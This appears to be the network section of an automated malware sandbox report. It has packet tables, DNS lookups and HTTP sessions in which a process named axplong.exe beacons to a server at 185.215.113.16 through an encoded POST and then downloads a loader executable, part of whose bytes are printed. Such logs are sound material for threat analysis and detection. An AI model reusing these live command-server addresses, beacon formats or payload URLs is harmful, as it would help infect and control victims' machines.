Sep 27, 2024 17:43:03.822753906 CEST  49862        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.844938993 CEST  443          49861      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.845050097 CEST  443          49861      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.845324039 CEST  49861        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.862689018 CEST  49861        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.862689018 CEST  49861        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.862720966 CEST  443          49861      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.862731934 CEST  443          49861      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.902981997 CEST  49860        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.903340101 CEST  49863        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.908718109 CEST  80           49863      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:03.908821106 CEST  49863        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.908896923 CEST  80           49860      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:03.909044981 CEST  49860        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.909044981 CEST  49863        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.914047003 CEST  80           49863      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:04.085566044 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.085643053 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:04.085714102 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.086004972 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.086023092 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:04.144597054 CEST  49862        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.144620895 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:04.634247065 CEST  80           49863      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:04.634404898 CEST  49863        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:04.638430119 CEST  49863        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:04.638560057 CEST  49865        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:04.643548012 CEST  80           49865      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:04.643630028 CEST  49865        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:04.643745899 CEST  80           49863      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:04.643924952 CEST  49863        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:04.644211054 CEST  49865        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:04.649116039 CEST  80           49865      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:04.873476028 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:04.873611927 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.876462936 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.876502037 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:04.877511978 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:04.878667116 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:04.919428110 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:05.293803930 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:05.294023991 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:05.294086933 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:05.294353962 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:05.294377089 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:05.294392109 CEST  49864        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:05.294399977 CEST  443          49864      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:05.362236977 CEST  80           49865      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:05.362349033 CEST  49865        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:05.492897034 CEST  49865        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:05.493465900 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:05.498526096 CEST  80           49865      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:05.498541117 CEST  80           49866      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:05.498584986 CEST  49865        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:05.498632908 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:05.498855114 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:05.504095078 CEST  80           49866      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:05.527498960 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:05.527554035 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:05.527651072 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:05.528238058 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:05.528255939 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.019598007 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.019684076 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:06.034652948 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:06.034693956 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.035510063 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.038050890 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:06.079425097 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.245016098 CEST  80           49866      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:06.247445107 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.278886080 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.283946037 CEST  80           49866      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:06.303870916 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.304136038 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.304337025 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:06.304713011 CEST  49867        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:06.304745913 CEST  443          49867      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:06.515132904 CEST  80           49866      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:06.515361071 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.650926113 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.652204037 CEST  49868        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.656280041 CEST  80           49866      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:06.656457901 CEST  49866        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.657172918 CEST  80           49868      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:06.658586025 CEST  49868        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.659894943 CEST  49868        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:06.664735079 CEST  80           49868      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:07.133666039 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:07.133703947 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:07.133769035 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:07.134218931 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:07.134232998 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:07.374871016 CEST  80           49868      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:07.375430107 CEST  49868        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:07.378210068 CEST  49868        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:07.378531933 CEST  49870        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:07.383702040 CEST  80           49868      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:07.383738041 CEST  80           49870      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:07.387408972 CEST  49868        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:07.387442112 CEST  49870        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:07.387698889 CEST  49870        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:07.392549038 CEST  80           49870      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:07.607981920 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:07.608073950 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:07.609407902 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:07.609414101 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:07.609733105 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:07.610565901 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:07.651412010 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.053556919 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.053939104 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.055449009 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.055741072 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.055754900 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.055769920 CEST  49869        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.055774927 CEST  443          49869      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.150934935 CEST  80           49870      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:08.151026964 CEST  49870        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:08.260656118 CEST  49870        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:08.261202097 CEST  49871        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:08.267815113 CEST  80           49870      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:08.267831087 CEST  80           49871      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:08.267874956 CEST  49870        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:08.267914057 CEST  49871        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:08.273228884 CEST  49871        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:08.278089046 CEST  80           49871      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:08.341711998 CEST  49872        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.341756105 CEST  443          49872      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.341845036 CEST  49872        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.343040943 CEST  49872        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.343055010 CEST  443          49872      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.832494974 CEST  443          49872      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.832648993 CEST  49872        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.847392082 CEST  49872        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.847440958 CEST  443          49872      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.848021984 CEST  443          49872      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:08.849124908 CEST  49872        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:08.895404100 CEST  443          49872      172.67.187.100   192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.984005928 CEST8049871185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.984062910 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.987535000 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.987950087 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.992830992 CEST8049871185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.992964029 CEST4987180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.993035078 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:08.993143082 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.993453979 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:08.998394966 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.104836941 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.104950905 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.105087042 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:09.105417967 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:09.105417967 CEST49872443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:09.105463028 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.105475903 CEST44349872172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.713608027 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.713762045 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.819128036 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.819746017 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.824754953 CEST8049873185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.824863911 CEST4987380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.825046062 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:09.825171947 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.825216055 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:09.830720901 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.564949989 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.565022945 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.568511963 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.568794966 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.573681116 CEST8049874185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.573759079 CEST4987480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.573821068 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:10.573898077 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.574079037 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:10.578921080 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.303515911 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.303720951 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.414117098 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.414464951 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.419265032 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.419413090 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.419451952 CEST8049875185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:11.419745922 CEST4987580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.419888973 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:11.424607992 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.144037008 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.147452116 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.150378942 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.150667906 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.155483961 CEST8049876185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.155529022 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.155602932 CEST4987680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.155635118 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.155832052 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:12.160572052 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.889877081 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:12.889940023 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.007437944 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.007725000 CEST4987880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.014189005 CEST8049878185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.014261007 CEST4987880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.014377117 CEST4987880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.015579939 CEST8049877185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.015655041 CEST4987780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:13.019248962 CEST8049878185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.723464966 CEST8049878185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:13.724644899 CEST4987880192.168.2.4185.215.113.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 17:42:04.736905098 CEST | 63691 | 53 | 192.168.2.4 | 1.1.1.1
Sep 27, 2024 17:42:05.044639111 CEST | 53 | 63691 | 1.1.1.1 | 192.168.2.4
Sep 27, 2024 17:42:48.616867065 CEST | 56532 | 53 | 192.168.2.4 | 1.1.1.1
Sep 27, 2024 17:42:48.669641972 CEST | 53 | 56532 | 1.1.1.1 | 192.168.2.4
Sep 27, 2024 17:42:48.701251984 CEST | 50465 | 53 | 192.168.2.4 | 1.1.1.1
Sep 27, 2024 17:42:48.708861113 CEST | 53 | 50465 | 1.1.1.1 | 192.168.2.4
Sep 27, 2024 17:42:54.940818071 CEST | 60289 | 53 | 192.168.2.4 | 1.1.1.1
Sep 27, 2024 17:42:54.972533941 CEST | 53 | 60289 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 17:42:04.736905098 CEST | 192.168.2.4 | 1.1.1.1 | 0xa34c | Standard query (0) | eijfrhegrtbrfcd.online | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:48.616867065 CEST | 192.168.2.4 | 1.1.1.1 | 0xf358 | Standard query (0) | sanctam.net | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:48.701251984 CEST | 192.168.2.4 | 1.1.1.1 | 0x3984 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:54.940818071 CEST | 192.168.2.4 | 1.1.1.1 | 0x37f6 | Standard query (0) | sanctam.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 17:42:05.044639111 CEST | 1.1.1.1 | 192.168.2.4 | 0xa34c | No error (0) | eijfrhegrtbrfcd.online | | 172.67.187.100 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:05.044639111 CEST | 1.1.1.1 | 192.168.2.4 | 0xa34c | No error (0) | eijfrhegrtbrfcd.online | | 104.21.64.194 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:48.669641972 CEST | 1.1.1.1 | 192.168.2.4 | 0xf358 | Name error (3) | sanctam.net | none | none | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:48.708861113 CEST | 1.1.1.1 | 192.168.2.4 | 0x3984 | No error (0) | github.com | | 140.82.121.3 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 17:42:54.972533941 CEST | 1.1.1.1 | 192.168.2.4 | 0x37f6 | Name error (3) | sanctam.net | none | none | A (IP address) | IN (0x0001) | false
• eijfrhegrtbrfcd.online
• github.com
• 185.215.113.16
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:02.480288982 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:03.184892893 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:03.186999083 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:03.414268017 CEST | 305 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Ascii: 73 <c>1000359001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72ff3fcfeb65854bbbc312a26892bca0b88f76ca49a#<d>0
Sep 27, 2024 17:42:03.417568922 CEST | 65 | OUT | GET /inc/loader_5879465914.exe HTTP/1.1
Host: 185.215.113.16
Sep 27, 2024 17:42:03.636137009 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:03 GMT
Content-Type: application/octet-stream
Content-Length: 435820
Last-Modified: Fri, 27 Sep 2024 14:49:05 GMT
Connection: keep-alive
ETag: "66f6c5e1-6a66c"
Accept-Ranges: bytes
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 12 00 86 a4 f6 66 00 e8 05 00 a8 08 00 00 f0 00 27 00 0b 02 02 1f 00 36 00 00 00 ae 00 00 00 0a 00 00 b0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 a0 06 00 00 06 00 00 6c d7 06 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 0c 10 00 00 00 f0 00 00 c0 45 00 00 00 80 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 68 [TRUNCATED]
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf'6@l` Ex@h(`.textX56`P`.dataP<@P.rdata`>@`@.pdataxP@0@.xdataT@0@.bss`.idataX@0.CRThj@@.tlsl@@.rsrcEFn@0/4@@B/19P@B/31)*J@B/45(*t@B/57@
Sep 27, 2024 17:42:03.636178970 CEST | 224 | IN | Data Raw: 0c 00 00 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 37 30 00 00 00 00 00 e4 07 00 00 00 50 06 00 00 08 00 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 29 2f 00 00 00 60 06 00 00 30 00
    Data Ascii: @@B/70P@B/81)/`0@B/92p@B
Sep 27, 2024 17:42:03.636214018 CEST | 1236 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii:
Sep 27, 2024 17:42:03.636246920 CEST | 1236 | IN | Data Raw: 49 39 dd 75 ce 4a 8d 44 25 f8 48 c7 00 00 00 00 00 48 89 2d 8b 8c 00 00 e8 d6 18 00 00 48 8b 05 df 57 00 00 48 8b 15 70 8c 00 00 8b 0d 7a 8c 00 00 48 8b 00 48 89 10 4c 8b 05 5d 8c 00 00 48 8b 15 5e 8c 00 00 e8 20 16 00 00 8b 0d 3f 8c 00 00 89 05
    Data Ascii: I9uJD%HH-HWHpzHHL]H^ ?='u- H[^_]A\A]D$`fDH5WO-HWHW!-1Hf
Sep 27, 2024 17:42:03.636279106 CEST | 1236 | IN | Data Raw: 00 00 5d c3 55 56 53 48 89 e5 48 89 4d 20 89 55 28 48 8b 45 20 48 8d 70 04 48 8b 45 20 4c 8d 58 08 48 8b 45 20 4c 8d 50 0c 8b 45 28 0f a2 41 89 d8 41 89 c1 48 8b 45 20 44 89 08 44 89 06 41 89 0b 41 89 12 90 5b 5e 5d c3 55 48 89 e5 48 83 ec 30 48
    Data Ascii: ]UVSHHM U(HE HpHE LXHE LPE(AAHE DDAA[^]UHH0HEHEH0]UWHHH$HUnknown HProcessoHHHrHHHHHHD$ AAH
Sep 27, 2024 17:42:03.636312962 CEST | 1236 | IN | Data Raw: c0 75 2d b9 02 00 00 00 48 8b 05 2c 33 00 00 ff d0 49 89 c1 41 b8 17 00 00 00 ba 01 00 00 00 48 8d 0d 13 45 00 00 e8 d8 23 00 00 e9 40 01 00 00 48 8d 45 c0 48 89 c2 48 8d 0d 13 45 00 00 e8 a0 23 00 00 48 8d 45 c0 48 c7 44 24 30 00 00 00 00 c7 44
    Data Ascii: u-H,3IAHE#@HEHHE#HEHD$0D$(D$ AAHHHHHEHHtYHEHHotHD"RHO2IA
Sep 27, 2024 17:42:03.636348009 CEST | 896 | IN | Data Raw: 89 c0 48 8d 15 d2 42 00 00 48 8b 4d 70 e8 c5 1e 00 00 eb 00 90 48 81 c4 d8 00 00 00 5f 5d c3 55 57 48 81 ec 98 04 00 00 48 8d ac 24 80 00 00 00 48 89 8d 30 04 00 00 48 8d 85 d0 03 00 00 48 89 c1 48 8b 05 9f 92 00 00 ff d0 c7 85 90 03 00 00 40 00
    Data Ascii: HBHMpH_]UWHH$H0HHH@HHHHUnknown OSHHH HHHH6HHHHHUnknown HProcessoHH
